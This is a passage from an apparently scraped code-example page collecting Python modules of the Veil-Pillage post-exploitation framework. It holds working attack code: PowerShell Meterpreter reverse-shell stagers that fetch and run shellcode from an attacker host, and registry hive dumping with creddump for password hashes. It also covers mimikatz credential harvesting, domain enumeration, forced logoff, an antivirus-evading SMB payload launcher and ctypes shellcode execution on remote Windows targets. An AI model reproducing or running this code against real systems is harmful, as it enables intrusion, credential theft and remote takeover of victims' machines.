        trigger_method. Appends one status line per target to self.output;
        those lines embed the password in clear text, so self.output must be
        handled as sensitive material. Returns None.
        """

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        for target in self.targets:

            # the built-in "logoff" command against session ID 1 (not a reg.exe
            # command); it terminates that session without warning
            command = "logoff 1"
            result = command_methods.executeCommand(target, username, password,
                                                    command, triggerMethod)

            # success is a plain substring match on whatever executeCommand returns --
            # presumably the transport's text output; confirm the format in command_methods
            if "success" in result:
                self.output += "[*] Logoff command successfully triggered using creds '" + username + ":" + password + "' on : " + target + "\n"
            else:
                self.output += "[!] Logoff command unsuccessful using creds '" + username + ":" + password + "' on : " + target + "\n"
コード例 #21
    def run(self):
        """
        Run the "net ... /domain" enumeration commands on each target and
        collect their combined output.

        Uses the first credential pair in self.creds; the trigger method is
        hard-coded to winexe. The commands append to out_file on the target,
        which is fetched over SMB after a fixed 20 second wait, deleted from the
        target, and stored locally through helpers.saveModuleFile as
        enum_domain.txt. Status lines appended to self.output embed the
        password in clear text. Returns None.
        """

        # assume single set of credentials
        username, password = self.creds[0]

        outFile = self.required_options["out_file"][0]

        # wmis doesn't like net * /domain commands >_<
        triggerMethod = "winexe"

        if "\\" not in outFile:
            # otherwise assume it's an absolute path
            outFile = "C:\\Windows\\Temp\\" + outFile

        for target in self.targets:

            # unused: nothing in this loop populates or reads it
            targetUsernames = []

            # outFile is substituted unquoted into every redirection, so a path
            # containing spaces or shell metacharacters breaks the command line;
            # ">>" appends, so a pre-existing file on the target is not truncated
            command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s" % {
                "p": outFile
            }

            # execute the command (the return value is not inspected)
            result = command_methods.executeCommand(target, username, password,
                                                    command, triggerMethod)

            # wait 20 seconds for commands to run
            # (a fixed delay; on a slow domain the file may be fetched before the
            # commands finish, which then surfaces as a partial result file)
            print helpers.color(
                "\n [*] Waiting 20 seconds for enumeration commands to run on '"
                + target + "'",
                status=True)
            time.sleep(20)

            # grab the output file and delete it from the target
            out = smb.getFile(target, username, password, outFile, delete=True)

            if out != "":
                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target,
                                                  "enum_domain.txt", out)
                self.output += "[*] enum_domain results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] enum_domain failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
コード例 #22
ファイル: enum_domain.py プロジェクト: AlTune/Veil-Pillage
    def run(self):
        """
        Run the "net ... /domain" enumeration commands on each target and
        collect their combined output.

        Uses the first credential pair in self.creds; the trigger method is
        hard-coded to winexe. The commands append to out_file on the target,
        which is fetched over SMB after a fixed 20 second wait, deleted from the
        target, and stored locally through helpers.saveModuleFile as
        enum_domain.txt. Status lines appended to self.output embed the
        password in clear text. Returns None.
        """

        # assume single set of credentials
        username, password = self.creds[0]

        outFile = self.required_options["out_file"][0]

        # wmis doesn't like net * /domain commands >_<
        triggerMethod = "winexe"

        if "\\" not in outFile:
            # otherwise assume it's an absolute path
            outFile = "C:\\Windows\\Temp\\" + outFile 

        for target in self.targets:

            # unused: nothing in this loop populates or reads it
            targetUsernames = []

            # outFile is substituted unquoted into every redirection, so a path
            # containing spaces or shell metacharacters breaks the command line;
            # ">>" appends, so a pre-existing file on the target is not truncated
            command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s"%{"p":outFile}

            # execute the command (the return value is not inspected)
            result = command_methods.executeCommand(target, username, password, command, triggerMethod)

            # wait 20 seconds for commands to run
            # (a fixed delay; on a slow domain the file may be fetched before the
            # commands finish, which then surfaces as a partial result file)
            print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True)
            time.sleep(20)

            # grab the output file and delete it from the target
            out = smb.getFile(target, username, password, outFile, delete=True)

            if out != "":
                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out)
                self.output += "[*] enum_domain results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
            else:
                self.output += "[!] enum_domain failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
コード例 #23
    def run(self):
        """
        Launch a PowerShell Meterpreter stager (rev_tcp, rev_http or rev_https)
        on each target, optionally spawning a local msfconsole handler first.

        Reads trigger_method, stager, lhost, lport and spawn_handler from
        self.required_options. The handler resource script is always written to
        the fixed path /tmp/handler.rc, whether or not a handler is spawned.
        lhost and lport are %-formatted into the PowerShell templates without
        validation, and lport is also string-concatenated, so it must be a str.
        Every per-target line added to self.output and self.cleanup embeds the
        password in clear text. Returns "" when the stager name is not
        recognized, otherwise None.
        """

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        stager = self.required_options["stager"][0]
        lhost = self.required_options["lhost"][0]
        lport = self.required_options["lport"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # start building the handler in case we want to invoke it
        handler = "use exploit/multi/handler"

        # the pure powershell windows/meterpreter/reverse_tcp stager
        # (a single connect attempt wrapped in try/catch; on success the thread
        # is kept alive with a 24 hour Start-Sleep)
        revTCPStager = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
"@
try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$s.Connect('%s', %s) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0
$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF
while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,32,[System.Net.Sockets.SocketFlags]::None) }
for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}
$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)
$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(lhost, lport)

        # the pure powershell windows/meterpreter/reverse_http stager
        # ("%%" is a literal percent sign because the template is %-formatted below)
        revHTTPStager = """$q = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)}
function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e; foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)")
$n = g; [Byte[]] $p = $m.DownloadData("http://%s:%s/$n" )
$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(lhost, lport)

        # the pure powershell windows/meterpreter/reverse_https stager
        # (same as the http variant, plus a process-wide
        # ServerCertificateValidationCallback of {$true}, i.e. no TLS certificate checking)
        revHTTPSStager = """$q = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)}
function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;
$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://%s:%s/$n" )
$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(lhost, lport)

        # get the encoded powershell trigger command
        if stager.lower() == "rev_tcp":
            triggerCMD = helpers.encPowershell(revTCPStager)
            handler += "\nset PAYLOAD windows/meterpreter/reverse_tcp"
        elif stager.lower() == "rev_http":
            triggerCMD = helpers.encPowershell(revHTTPStager)
            handler += "\nset PAYLOAD windows/meterpreter/reverse_http"
        elif stager.lower() == "rev_https":
            triggerCMD = helpers.encPowershell(revHTTPSStager)
            handler += "\nset PAYLOAD windows/meterpreter/reverse_https"
        else:
            print helpers.color("\n [!] Stager not recognized: please enter rev_tcp, rev_http, or rev_https\n", warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""

        # finish off the handler and write it to the tmp directory
        # (fixed, predictable path in the shared /tmp with the default umask; the file
        # is overwritten on every run and never removed here)
        handler += "\nset LHOST " + lhost
        handler += "\nset LPORT " + lport
        handler += "\nset ExitOnSession false"
        handler += "\nexploit -j\n"
        f = open('/tmp/handler.rc', 'w')
        f.write(handler)
        f.close()

        # build and spawn a handler for the invoked payload
        if spawnHandler.lower() == "true":
            handlerPath = "/tmp/handler.rc"
            # command to spawn a new tab (a fixed string; no user input reaches os.system here)
            cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
            # invoke msfconsole with the handler script in a new tab
            os.system(cmd)
            raw_input("\n\n [>] Press enter when handler is ready: ")

        # execute the powershell trigger command on each target
        for target in self.targets:

            # trigger the command and set output as appropriate
            print "\n [*] Triggering powershell stager '"+stager.lower()+"' with lhost="+lhost+" and lport="+lport+" on "+target
            self.output += "[*] Triggering powershell stager '"+stager.lower()+"' with lhost="+lhost+" and lport="+lport+" using creds '"+username+":"+password+"' on "+target+"\n"
            command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)

            # build our cleanup file -> kill all powershell processes
            # (this is indiscriminate: every powershell.exe on the target is terminated,
            # not just the one started here; the record also stores the password in clear text)
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
コード例 #24
ファイル: hashdump.py プロジェクト: 5l1v3r1/Veil-Pillage-1
    def run(self):
        """
        Export the SYSTEM, SECURITY and SAM hives from each target with reg.exe,
        pull them back over SMB and extract local account hashes with creddump.

        Uses the first credential pair in self.creds and the configured
        trigger_method. The hive copies are written to fixed names under
        C:\\Windows\\Temp on the target and are fetched with delete=False, so
        this method leaves them there. Locally the hives are written to the
        fixed paths /tmp/system, /tmp/security and /tmp/sam, overwritten per
        target and never removed here. Per-target results go through
        helpers.saveModuleFile as hashes.txt; the final output lists the
        de-duplicated, lower-cased hashes across all targets. Status lines in
        self.output embed the password in clear text. Returns None.
        """

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # let's keep track of ALL hashes found
        allHashes = ""

        # reg.exe command to save off the hives
        # (/y overwrites any existing copy; all three saves are chained with &&)
        regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

        for target in self.targets:

            print helpers.color("\n [*] Dumping hashes on " + target)

            # execute the registry save command (return value not inspected)
            command_methods.executeCommand(target, username, password,
                                           regSaveCommand, triggerMethod)

            # sleep for 5 seconds to let everything backup
            time.sleep(5)

            # grab all of the backed up files
            # (delete=False: the hive copies stay on the target after this runs)
            systemFile = smb.getFile(target,
                                     username,
                                     password,
                                     "C:\\Windows\\Temp\\system",
                                     delete=False)
            securityFile = smb.getFile(target,
                                       username,
                                       password,
                                       "C:\\Windows\\Temp\\security",
                                       delete=False)
            samFile = smb.getFile(target,
                                  username,
                                  password,
                                  "C:\\Windows\\Temp\\sam",
                                  delete=False)

            # error gates the creddump call below on SYSTEM and SAM only
            error = False
            if systemFile == "":
                # note: this interpolates the (empty) file content, not the file name,
                # so the message always reads "File ''"
                self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
                error = True
            else:
                # predictable path in the shared /tmp, created with the default umask
                f = open('/tmp/system', 'w')
                f.write(systemFile)
                f.close()

            if securityFile == "":
                # same interpolation issue as above; a missing SECURITY hive does not
                # set error because only SYSTEM and SAM are handed to creddump
                self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open('/tmp/security', 'w')
                f.write(securityFile)
                f.close()

            if samFile == "":
                # same interpolation issue as above
                self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
                error = True
            else:
                f = open('/tmp/sam', 'w')
                f.write(samFile)
                f.close()

            if not error:
                # get all the hashes from these hives
                hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")

                # add the hashes to our global list
                # (string concatenation; de-duplication happens once at the end)
                allHashes += hashes

                # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
                saveLocation = helpers.saveModuleFile(self, target,
                                                      "hashes.txt", hashes)

                self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"

            else:
                self.output += "[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n"

        if allHashes != "":
            # get all non-empty hashes, uniquify and sort them
            allHashes = [p.lower() for p in allHashes.split("\n") if p != '']
            allHashes = sorted(set(allHashes))
            self.output += "[*] All unique hashes:\n" + "\n".join(
                allHashes) + "\n"
コード例 #25
ファイル: autograb.py プロジェクト: johnjohnsp1/Veil-Pillage
    def run(self):
        """
        Collect local hashes and in-memory credentials from each target, using
        autograb.ps1 where PowerShell is available and reg.exe + a hosted
        mimikatz binary otherwise.

        Reads lhost, use_ssl, force_method, delay and out_file from
        self.required_options and uses the first credential pair in self.creds.
        delay is converted with int() and a non-numeric value raises ValueError.
        The PowerShell branch checks with "wmis", triggers with "winexe"; the
        binary branch uses "wmis" throughout. Both branches leave artifacts:
        the binary branch writes hive copies to fixed names under
        C:\\Windows\\Temp on the target (fetched with delete=False) and to the
        fixed local paths /tmp/system, /tmp/security and /tmp/sam, which are
        overwritten per target and never removed here. Results are stored via
        helpers.saveModuleFile and summarised, de-duplicated, at the end.
        Every status line in self.output embeds the password in clear text.
        Returns None.
        """

        # assume single set of credentials for this module
        username, password = self.creds[0]

        lhost = self.required_options["lhost"][0]
        use_ssl = self.required_options["use_ssl"][0]
        force_method = self.required_options["force_method"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # let's keep track of all credentials found
        allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []

        for target in self.targets:

            powershellInstalled = False

            # check if we're forcing a particular grab method
            if force_method.lower() == "binary":
                powershellInstalled = False
            elif force_method.lower() == "powershell":
                powershellInstalled = True
            else:
                # check if we have a functional Powershell installation
                # (an exact match on "42" after strip(); any banner or error text
                # in the result falls through to the binary branch)
                powershellCommand = 'powershell.exe -c "$a=42;$a"'
                powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
                if powershellResult.strip() == "42":
                    powershellInstalled = True

            if powershellInstalled:

                # do powersploit combined file of invoke-mimikatz and powerdump
                print helpers.color("\n [*] Powershell installed on " + target)
                self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

                # the temporary output file we will write to
                # (out_file is rebound across loop iterations; after the first
                # prefix it contains a backslash, so the prefix is applied once)
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                # path to the combined Invoke-Mimikatz/powerdump powershell script
                secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"

                # trigger the powershell download on just this target
                delivery_methods.powershellHostTrigger(
                    target,
                    username,
                    password,
                    secondStagePath,
                    lhost,
                    "",
                    triggerMethod="winexe",
                    outFile=out_file,
                    ssl=use_ssl,
                    noArch=True,
                )

                # fixed wait; too short a delay yields an empty or partial out_file
                print "\n [*] Waiting " + delay + "s for Autograb to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target, username, password, out_file, delete=True)

                # save the file off to the appropriate location
                # (saved even when out is empty; the status below reports that case)
                saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # parse the powerdump component
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                if out != "":
                    self.output += (
                        "[*] Autograb.ps1 results using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " stored at "
                        + saveFile
                        + "\n"
                    )
                else:
                    self.output += (
                        "[!] Autograb.ps1 failed using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " : no result file\n"
                    )

            else:
                # do reg.exe for hashdump and host/execute for mimikatz
                print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
                print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target)
                self.output += "[!] Powershell not installed on " + target + "\n"

                # reg.exe command to save off the hives
                # (/y overwrites any existing copy; all three saves are chained with &&)
                regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

                # execute the registry save command (return value not inspected)
                command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")

                print helpers.color("\n [*] Dumping hashes on " + target)

                # sleep for 5 seconds to let everything backup
                time.sleep(5)

                # grab all of the backed up files
                # (delete=False: the hive copies stay on the target after this runs)
                systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
                securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
                samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)

                # more error-checking here?
                # Unlike the standalone hashdump module there is no error flag: a missing
                # hive is reported but creddump still runs below on whatever /tmp/system
                # and /tmp/sam currently hold, possibly a previous target's hives, and the
                # result is attributed to this target. Each message also interpolates the
                # (empty) file content rather than the file name.
                if systemFile == "":
                    self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    # predictable path in the shared /tmp, created with the default umask
                    f = open("/tmp/system", "w")
                    f.write(systemFile)
                    f.close()

                if securityFile == "":
                    self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/security", "w")
                    f.write(securityFile)
                    f.close()

                if samFile == "":
                    self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/sam", "w")
                    f.write(samFile)
                    f.close()

                # get all the hashes from these hives (runs unconditionally, see above)
                out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")

                # save the output file off
                saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
                self.output += (
                    "[*] dumped hashes (reg.exe) using creds '"
                    + username
                    + ":"
                    + password
                    + "' on "
                    + saveLocation
                    + "\n"
                )

                # save these off to the universal list
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                # now, detect the architecture
                # (a loose substring test on the echoed variable; anything else is treated as x86)
                archCommand = "echo %PROCESSOR_ARCHITECTURE%"
                archResult = command_methods.executeResult(target, username, password, archCommand, "wmis")
                arch = "x86"
                if "64" in archResult:
                    arch = "x64"

                # now time for ze mimikatz!
                mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

                # the temporary output file we will write to
                # (same once-only prefixing as in the PowerShell branch)
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                # out_file is appended to the redirection unquoted
                exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file

                # host mimikatz.exe and trigger it ONLY on this particular machine
                # so we can get the architecture correct
                delivery_methods.hostTrigger(
                    target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs
                )

                # fixed wait; too short a delay yields an empty or partial out_file
                print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target, username, password, out_file, delete=True)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # save the file off to the appropriate location
                # (saved even when out is empty; the status below reports that case)
                saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)

                if out != "":
                    self.output += (
                        "[*] Mimikatz results using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " stored at "
                        + saveFile
                        + "\n"
                    )
                else:
                    self.output += (
                        "[!] Mimikatz failed using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " : no result file\n"
                    )

        # cross-target summaries: each list is de-duplicated and sorted, and only
        # emitted when something was collected
        if len(allhashes) > 0:
            allhashes = sorted(set(allhashes))
            self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
コード例 #26
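def hostTrigger(targets,
                username,
                password,
                exePath,
                localHost,
                triggerMethod="wmis",
                exeArgs=""):
    """
    Host the binary at exePath on a temporary local SMB share and execute it
    on each target via a UNC path, so the executable is never written to the
    target's disk.

    The payload is copied under a random name into ``settings.TEMP_DIR``/shared/,
    ``smb.ThreadedSMBServer`` is started, and ``command_methods.executeCommand``
    runs ``\\\\localHost\\system\\<random>.exe <exeArgs>`` on every target with
    the given triggerMethod (default wmis). After a fixed 10s grace period the
    server is stopped and the share directory removed again.

    Note: this evades several AV vendors, even with normally disk-detectable
    executables #avlol :)

    This takes 'targets' (a str or a list of str) instead of a single 'target'
    since we don't want to set up and tear down the local SMB server every time.

    Returns the randomized hosted file name so the calling method can later
    clean the matching processes up.

    Operational note: while the server is up, everything under shared/ is
    served to whoever can reach the SMB port, so keep the window short and
    ``settings.TEMP_DIR`` operator-private.
    """
    # function-scope import: the file's import block is not guaranteed to have it
    import shutil

    # if we get a single target, make it into a list
    if isinstance(targets, str):
        targets = [targets]

    # randomize the hosted .exe file name
    hostedFileName = helpers.randomString() + ".exe"

    # one normalised share path; the original mixed TEMP_DIR + "shared/",
    # "/" + TEMP_DIR + "/shared/" and TEMP_DIR + "/shared/", which only agree
    # when TEMP_DIR is absolute with a trailing slash
    shareDir = os.path.join(settings.TEMP_DIR, "shared")

    # make the tmp hosting directory if it doesn't already exist
    if not os.path.exists(shareDir):
        os.makedirs(shareDir)

    # copy the payload to the random hostedFileName in the share directory;
    # shutil.copy instead of os.system("cp " + exePath ...) so a path with
    # spaces or shell metacharacters can neither break nor inject into a shell
    shutil.copy(exePath, os.path.join(shareDir, hostedFileName))

    # spin up the SMB server
    server = smb.ThreadedSMBServer()
    server.start()
    time.sleep(.5)

    # build the UNC path back to our host and executable and any specified arguments
    cmd = "\\\\" + localHost + "\\system\\" + hostedFileName + " " + exeArgs

    try:
        for target in targets:
            # execute the UNC command for each target
            command_methods.executeCommand(target, username, password, cmd,
                                           triggerMethod)

        print(helpers.color("\n [*] Giving time for commands to trigger..."))
        # sleep so the wmis/winexe commands can trigger and the target
        # can grab the .exe from the SMB server
        time.sleep(10)
    finally:
        # always stop serving and remove the hosted payload, even if a trigger
        # raised: otherwise the binary stays exposed on the share
        server.shutdown()
        shutil.rmtree(shareDir, ignore_errors=True)

    # return the randomized name in case the calling method later wants
    # to clean the processes up
    return hostedFileName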
コード例 #27
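    def run(self):
        """
        Upload a minimal Python environment to each target and execute
        Veil-Evasion shellcode through ``python.exe -c`` and ctypes.

        Per target: 7za.exe and python.zip are uploaded over SMB to
        C:\\Windows\\Temp, the archive is extracted, then python.exe is run
        with a one-liner that base64-decodes the shellcode into a
        create_string_buffer and calls it. Cleanup entries that kill
        python.exe and delete the uploaded environment are appended to
        ``self.cleanup``.

        Reads ``self.creds[0]``, the required options trigger_method and
        spawn_handler, and ``self.args`` msfpayload / msfoptions / custshell.
        Status lines appended to ``self.output`` and ``self.cleanup`` contain
        the plaintext password, as elsewhere in this module, so treat those
        files as sensitive.
        """

        handlerPath = "none"

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # nab up some shellcode from Veil-Evasion
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            sc.setCustomShellcode(self.args.custshell)

        # base64 our shellcode (generate() yields a "\x.." escaped string)
        b64sc = base64.b64encode(sc.generate().decode("string_escape"))

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
                         "...")

        # command to spawn msfconsole with a handler script in a new terminal tab
        handlerCmdTemplate = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '%s'\""

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                os.system(handlerCmdTemplate % handlerPath)
                raw_input("\n\n [>] Press enter when handler is ready: ")
            else:
                # previously silent: the payload would fire with nothing listening
                print(helpers.color(" [!] Warning: no handler script was generated, continuing without a handler", warning=True))

        # otherwise, if we have a custom handler path, try to invoke that.
        # NOTE(review): handlerPath is a local initialised to "none" above and
        # only reassigned in the spawn_handler branch, so this branch cannot run
        # until a custom handler option is actually wired in.
        elif handlerPath.lower() != "none":
            # a handler .rc is a file, not a directory
            if os.path.isfile(handlerPath):
                os.system(handlerCmdTemplate % handlerPath)
                raw_input("\n [>] Press enter when handler is ready: ")
            else:
                print(helpers.color(" [!] Warning: handlerPath '" +
                                    handlerPath + "' not valid!"))

        # command to unzip the uploaded python installation
        unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
        # path to the 7zip binary
        zipPath = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe"

        # command to invoke shellcode using python
        pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % (
            b64sc)
        # path to the minimal python install
        pythonPath = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip"

        for target in self.targets:

            # upload the 7zip.exe binary and the python install
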